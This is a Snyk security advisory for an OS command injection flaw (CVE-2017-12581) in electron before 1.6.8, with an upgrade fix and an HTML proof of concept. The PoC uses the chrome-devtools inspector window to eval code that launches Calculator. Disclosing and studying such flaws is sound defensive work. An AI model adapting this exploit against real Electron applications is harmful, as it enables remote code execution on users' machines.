Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Affecting electron package, versions <1.6.8
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-ELECTRON-6016330
- published 20 Oct 2023
- disclosed 17 May 2022
- credit Luca Carettoni
Introduced: 17 May 2022
CVE-2017-12581 Open this link in a new tabHow to fix?
Upgrade electron to version 1.6.8 or higher.
Overview
electron is a framework which lets you write cross-platform desktop applications using JavaScript, HTML and CSS.
Affected versions of this package are vulnerable to Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') via the nodeIntegration function. An attacker can execute remote commands by exploiting a precondition that bypasses the Same Origin Policy (SOP). Combining an SOP bypass with a privileged URL internally used by this library, it is possible to execute native Node.js primitives in order to run OS commands on the user's host. Specifically, a chrome-devtools://devtools/bundled/inspector.html window could be used to eval a Node.js child_process.execFile API call.
PoC
<!DOCTYPE html>
<html>
<head>
<title>nodeIntegration bypass (SOP2RCE)</title>
</head>
<body>
<script>
document.write("Current location:" + window.location.href + "<br>");
const win = window.open("chrome-devtools://devtools/bundled/inspector.html");
win.eval("const {shell} = require('electron');
shell.openExternal('file:///Applications/Calculator.app');");
</script>
</body>
</html>